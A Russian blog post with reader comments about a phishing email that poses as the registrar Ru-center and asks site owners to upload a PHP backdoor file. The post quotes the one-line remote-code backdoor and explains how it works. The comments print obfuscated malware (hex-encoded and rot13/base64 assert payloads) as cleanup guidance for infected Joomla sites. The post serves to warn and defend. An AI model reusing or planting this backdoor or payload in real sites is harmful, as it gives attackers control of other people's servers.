В начале недели я получил письмо якобы от имени регистратора доменных имен Ru-center.
Письмо оформлено в корпоративном стиле регистратора. В письме в кратчайшее сроки предлагается разместить некий файл на своём сайте. Цель одна – получить доступ к сайту.
К слову сказать, к атакуемому сайту уже лет пять не имею никакого отношения, но почту мою где-то нарыли.
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом **** осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим содержимым:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Код состоит всего из одной строки:
assert(stripslashes($_REQUEST[RUCENTER]));
assert - аналогично eval исполнит PHP-код, переданный в переменной RUCENTER
Как выяснилось, аналогичные письма приходят и от имени Роскомнадзора.
А вот, что по этому поводу пишет регистратор R01:
Уважаемый администратор!
Некоторые администраторы доменных имен получили письма от имени R01 c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом.
Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.
Чтобы не стать жертвой мошенничества:
• никогда не загружайте вложения и не устанавливайте внешние файлы;
• в случае малейших подозрений — уточняйте информацию в службе поддержки.Будьте бдительны!
Повторюсь: Будьте бдительны!
at 13:51
Спасибо за информацию. Жаль, раньше не посмотрел, скажите, что будет если я по глупости такой файл разместил, правда всего на одни сутки, потом удалил? Насколько это критично? Благодарю заранее, если ответите.
at 16:06
За это время хакер мог заразить ваш сайт. Загрузить на сервер свои скрипты или добавить свой код в существующие.
Надо проверять теперь все файлы на сервере на наличии модификаций, появления новых файлов.
Или можно убить весь сайт, удалить все, и восстановить его из незаряженной копии.
at 15:32
Если вдруг кому повезло и он залил себе файл и Ваша cms джумала ищите посмотрите по этому пути
ваш сайт/docs/templates/ваша тема/warp/systems/joomla/layouts/head.php
должно быть что-то вроде такого кода удаляем его.
<meta charset="document->getCharset(); ?>">
get('responsive', true)): ?>
-
<link rel="apple-touch-icon-precomposed" href="url('theme:apple_touch_icon.png'); ?>">
Соответственно удаляем файл a12tafm4a4dfj94m.php с содержанием из корневой директории.
Смотрим серверные файлы .htaccess он их перезаписывает
Далее ищем файлы с названиями index.php head.php site.php итд смотрим содеражание если присутствует код типа <?php $X4d = "\x63\x68\x72"; $i8 = "\x69\x6e\x74\x76\x61\x6c"; $Sc = "\x61\x72\x72\x61".$X4d($i8($X4d($i8("\x34\x39"))."\x32\x31"))."\x5f\x6d\x6
он обычно встает в начале файлов удаляем.
возможно появление файлов 139c.txt с содержанием в закодированном формате тоже удаляем.
Также возможно и расположение в файлах css
at 15:42
возможно такой код //###=CACHE START=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY2EyqT9xp3EdpaIwoF5lqF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvAzMyMwV4AwyvATZ5ZTMzZmN4ZzL3LGqzAJAxATIvBQZvYvExYvE1YvEwYvVkVvx7PzyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcVQ09VQRcVUfXWTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPE1pzjcBjc9VTIfp2IcMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxpzImqJk0VQ0tL3IloS9yrTIwXPEwnPx7PzA1pzksL2kip2HbWTAbXGfXWTyvqvN9VPElMKA1oUD7Pa0tMJkmMFO7PvEzpPN9VTMmo2Aeo3OyovtvMTI0o2EmqTclqJAgYaW1VvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVwMzMJLlBQL5LwEwBGOzMwZjBQWzA2R3MwIwMQEyLwtmVv4xMP4xqF4xLl4vZFVcYvVtFSEHHP8kYwSppykhVwfXVPNtVPEiqKDtYw0tVxuip3D6VTEyqT9xp3EdpaIwoF5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwWyZwyvZGL4VvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###